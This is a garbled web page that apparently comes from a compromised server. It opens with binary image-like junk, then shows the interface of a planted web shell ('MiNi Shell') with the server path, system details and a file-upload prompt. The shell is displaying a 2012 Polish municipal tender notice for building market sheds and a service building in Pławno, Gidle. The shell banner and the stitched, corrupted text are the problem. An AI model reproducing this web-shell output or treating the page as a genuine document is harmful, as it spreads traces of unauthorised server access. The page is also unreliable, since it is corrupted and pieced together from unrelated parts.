JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120726/162859-N-2012.html

<p class="kh_header"><b>Gidle: <br>Budowa dwóch wiat targowych i budynku zaplecza oraz remont budynku magazynowego targowicy na istniejącym placu targowym w miejscowości Pławno, gm. Gidle</b><br>
<b>Numer ogłoszenia: 162859 - 2012; data zamieszczenia: 26.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gidle , ul. Pławińska 22, 97-540 Gidle, tel. 034 3272027, faks 034 3272111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gidle.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> <br>Budowa dwóch wiat targowych i budynku zaplecza oraz remont budynku magazynowego targowicy na istniejącym placu targowym w miejscowości Pławno, gm. Gidle.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <br>Budowa dwóch wiat targowych i budynku zaplecza oraz remont budynku magazynowego targowicy na istniejącym placu targowym w miejscowości Pławno, gm. Gidle, na działce nr ewidencyjny gruntu 2427/5. Przedmiot zamówienia obejmuje:
<br>- utwardzenie terenu o łącznej powierzchni 3.368,50m<sup>2</sup> wraz z wykonaniem przebudowy dwóch zjazdów publicznych z drogi wojewódzkiej, w tym:
<br>a) kostka betonowa gr. 6 cm o powierzchni 497,5m<sup>2</sup> (ciągi piesze, miejsca targowe), na podsypce cementowo piaskowej 1:4, grubości 4 cm, zagęszczonej warstwie odsączającej z pospółki, grubości 10 cm;
<br>b) kostka betonowa gr. 8 cm o powierzchni 2.328,0m<sup>2</sup> na podsypce cementowo - piaskowej 1:4, grubości 4 cm, podbudowie o grubości 20 cm z kruszywa  łamanego stabilizowanego mechanicznie 0/31,5mm oraz warstwie odsączającej z pospółki o grubości 10 cm;
<br>c) płyty drogowe betonowe ażurowe gr. 8 cm o powierzchni 543m<sup>2</sup> na podsypce cementowo - piaskowej 1:4 i grubości 4 cm, podbudowie o grubości 20 cm z kruszywa  łamanego stabilizowanego mechanicznie 0/31,5mm oraz warstwie odsączającej z pospółki o grubości 10 cm;
<br>d) ułożenie obrzeży betonowych 8x30cm na ławie betonowej z oporem w ilości 57,1mb;
<br>e) ułożenie krawężników betonowych 15x30x100cm na ławie betonowej z oporem w ilości 316mb.
<br>- budowa budynku zaplecza targowicy - parterowego typu gotowego, o kubaturze 49,5m<sup>3</sup>, powierzchni zabudowy 17,5m<sup>2</sup> oraz powierzchni użytkowej 15,17m<sup>2</sup>;
<br>- budowa dwóch wiat targowych o wymiarach 6x32m każda, konstrukcja stalowa, dach dwuspadowy kryty blachą trapezową grubości 0,7mm, orynnowanie z systemu PCV;
<br>- wykonanie nowego ogrodzenia od frontu działki - demontaż istniejącego ogrodzenia z siatki oraz istniejących bram wjazdowych w ilości 3 szt. i montaż nowego ogrodzenia o długości 43m wykonanego z elementów panelowych z drutu 5mm na cokole prefabrykowanym betonowym wraz  z montażem 2 szt. bram przesuwnych oraz furtki z kształtowników stalowych zamkniętych z wypełnieniem panelowym (szerokość jednej bramy 5m, wysokość 1,5m), wymiary furtki: szerokość 1,0m, wysokość 1,5m; Ogrodzenie z pozostałych stron działki do malowania i uzupełnienia siatką o wysokości 1,6m na podmurówce i słupkach stalowych, długość ogrodzenia do uzupełnienia 26,4mb;
<br>- remont budynku magazynowego polegający na zamurowaniu 8 szt. otworów okiennych, ocieplaniu ścian styropianem o grubości 5,0cm, wykonaniu elewacji z tynku akrylowego, wymiana istniejącego pokrycia dachowego z blachy falistej na blachę trapezową, wymiana orynnowania oraz malowanie stolarki okiennej i drzwiowej;
<br>- budowę linii oświetleniowej i linii kablowej obejmującej wykonanie oświetlenia terenu za pomocą trzech słupów ulicznych prostych stalowych o wysokości 8,0m na fundamentach, z zamontowanymi oprawami metalohalogenkowymi (po 2 szt. na każdy słup), oraz budowę linii zasilających 0,4kV i złącza kablowego rozdzielni głównej ZR;
<br>- budowę przyłącza kanalizacji sanitarnej z rur PVC o średnicy 160mm i długości 18,5m zakończonego studzienką rewizyjną oraz budowę przyłącza wodociągowego przy użyciu przewodu polietylenowego o średnicy 32mm  i długości L=4,0m wraz z wykonaniem studni wodomierzowej  o średnicy 1000mm;
<br>- wykonanie wewnętrznej instalacji wodno - kanalizacyjnej w budynku zaplecza targowicy;
<br>- odwodnienie parkingu - poprzez wykonanie kanalizacji deszczowej składającej się z rur PVC o średnicy 200mm o łącznej długości L=51,0m, 2 szt. studni rewizyjnych z kręgów betonowych o średnicy 1000mm, 4 szt. wpustów ulicznych o średnicy 600mm, separatora lamelowego z osadnikiem oraz systemu skrzynek rozsączających.
<br><br>
Szczegółowy opis przedmiotu zamówienia zawierają projekty budowlane, specyfikacje techniczne wykonania i odbioru robót oraz przedmiary robot stanowiące załączniki do specyfikacji istotnych warunków zamówienia.                 
<br><br>
W przypadku przedstawienia w dokumentacji projektowej urządzeń, wyrobów oraz materiałów ze wskazaniem producenta należy traktować je jako przykładowe. Oznacza to, że wykonawca może zaproponować innych producentów dla urządzeń, wyrobów i materiałów określonych w dokumentacji projektowej z zachowaniem równoważnych, tj. nie gorszych parametrów technicznych.
<br><br>
Materiały użyte do realizacji zamówienia muszą odpowiadać, co do jakości wymaganiom określonym ustawą  z dnia 16 kwietnia 2004r. o wyrobach budowlanych (Dz.U. z 2004r. Nr 92, poz. 881 z późn. zm.). Na wbudowane materiały wykonawca zobowiązany jest posiadać odpowiedni certyfikat na znak bezpieczeństwa wskazujący, że zapewniono zgodność z kryteriami technicznymi określonymi na podstawie Polskiej Normy, aprobaty technicznej, deklaracje zgodności lub certyfikat zgodności z Polską Normą lub aprobatą techniczną, w przypadku wyrobów dla których nie ustanowiono Polskiej Normy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.31.40-6, 45.11.12.00-0, 45.40.00.00-1, 45.31.00.00-3, 45.33.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> <br>Zamawiający wymaga wniesienia wadium, ustala się wadium dla całości przedmiotu zamówienia w wysokości: <b>20.000,00zł</b>, (słownie: dwadzieścia tysięcy złotych).
<br>Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
<br>a) w pieniądzu, przelewem na rachunek bankowy: Bank Spółdzielczy w Żytnie O/Gidle Nr konta: 92 8267 1019 2101 0000 0127 0002 z adnotacją <q><i>wadium - przetarg targowisko Pławno</i></q>
<br>b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
<br>c) w gwarancjach bankowych, 
<br>d) w gwarancjach ubezpieczeniowych,
<br>e) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275), 
<br>w terminie do 14.08.2012r. do godz. 10.00. 
<br>Sposób przekazania - w przypadku wnoszenia wadium w formie innej niż pieniądz oryginał dokumentu wadialnego należy złożyć w oddzielnej kopercie/opakowaniu w Sekretariacie Urzędu Gminy w Gidlach, ul. Pławińska 22, 97-540 Gidle, pokój nr 9 (I piętro) przed upływem terminu składania ofert. Kopertę/opakowanie należy opatrzyć nazwą i dokładnym adresem wykonawcy z adnotacją: <q><i>WADIUM - Budowa dwóch wiat targowych i budynku zaplecza oraz remont budynku magazynowego targowicy na istniejącym placu targowym w miejscowości Pławno, gm. Gidle</i></q>. Kopię dokumentu wadialnego należy załączyć do oferty.     
<br>Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego.
<br> W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
<br>W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, w tym okresie zrealizował, tj. zakończył co najmniej dwie roboty budowlane zawierające w swym zakresie utwardzenie terenu, chodników lub placów z kostki betonowej lub brukowej, na powierzchni nie mniejszej niż 1.500m<sup>2</sup> i wartości inwestycji brutto minimum 300.000,00zł każda;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza warunku szczegółowego w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że będzie dysponował co najmniej po jednej osobie do pełnienia funkcji kierownika budowy oraz kierowników robót, posiadających uprawnienia budowlane do kierowania robotami budowlanymi w następujących specjalnościach:
<br>a) kierownik budowy w specjalności konstrukcyjno - budowlanej;
<br>b) kierownik robót drogowych w specjalności drogowej;
<br>c) kierownik robót elektrycznych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
<br>d) kierownik robót wodno - kanalizacyjnych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę, że posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 500.000,00zł oraz posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 200.000,00zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Formularz ofertowy (wzór - załącznik nr 1 do siwz);
<br>b) Dokumenty potwierdzające posiadanie uprawnień/ pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych;
<br>c) Kosztorys ofertowy - opracowany metodą kalkulacji uproszczonej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Przewiduje się możliwość zmiany terminu wykonania umowy w następujących przypadkach:
<br>a) przestojów lub opóźnień zawinionych przez Zamawiającego;
<br>b) działania siły wyższej (np. klęski żywiołowe), mającego bezpośredni wpływ na termin wykonania robót; 
<br>c) wystąpienia szczególnie niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie robót - fakt ten musi mieć odzwierciedlenie w dzienniku budowy i musi być potwierdzony przez inspektora nadzoru;
<br>d) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności. 
<br>W przedstawionych powyżej przypadkach wystąpienia opóźnień strony ustalą nowe terminy realizacji, z tym że okres przesunięcia terminu zakończenia robót nie może być większy niż okres przerwy lub przestoju.
<br>Wykonawca nie będzie uprawniony do przedłużenia terminu wykonania umowy, jeżeli na przedłużenie terminu wpływ miały zaniedbania lub błędy ze strony wykonawcy.  
<br>2. Przewiduje się możliwość zmiany wynagrodzenia należnego wykonawcy, w następujących przypadkach:
<br>a) gdy ilość faktycznie wykonanych robót będzie odbiegała od ilości przedstawionej w przedmiarze robót. W takim przypadku wynagrodzenie zostanie proporcjonalnie zmniejszone lub zwiększone przy zachowaniu cen jednostkowych, przedstawionych w kosztorysie ofertowym;
<br>b) zwiększenia lub zmniejszenia ilości robót objętych kosztorysem ofertowym;
<br>c) nie wykonania jakiś robót objętych kosztorysem, lub wykonania robót nieprzewidzianych kosztorysem, a niezbędnych dla prawidłowego wykonania przedmiotu umowy;
<br>3. Dopuszcza się możliwość zmiany osób pełniących funkcję kierownika budowy i kierowników robót w następujących sytuacjach:
<br>a) śmierci, choroby lub innych zdarzeń losowych;
<br>b) niewywiązywania się specjalistów z obowiązków wynikających z umowy;
<br>c) jeżeli zmiana specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy, np. rezygnacja itp.,
<br>pod warunkiem, że nowa osoba przewidziana do pełnienia funkcji specjalisty posiada uprawnienia w specjalności wymaganej dla danego specjalisty.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gidle.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> <br>w wersji elektronicznej ze strony internetowej zamawiającego ww.bip.gidle.pl, lub w wersji papierowej w siedzibie Urzędu Gminy w Gidlach, ul. Pławińska 22, 97-540 Gidle, pokój nr 2 - (parter).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2012 godzina 10:00, miejsce: Urząd Gminy w Gidlach, ul. Pławińska 22, 97-540 Gidle, pokój nr 9 - Sekretariat (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 12.09.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> <br>Zamówienie współfinansowane ze środków Unii Europejskiej w ramach działania <i><q>Podstawowe usługi dla gospodarki i ludności wiejskiej</q></i> objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013, tytuł operacji: <i><q>Budowa dwóch wiat targowych i budynku zaplecza oraz remont budynku magazynowego targowicy na istniejącym placu targowym w miejscowości Pławno, gm. Gidle</q></i>.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com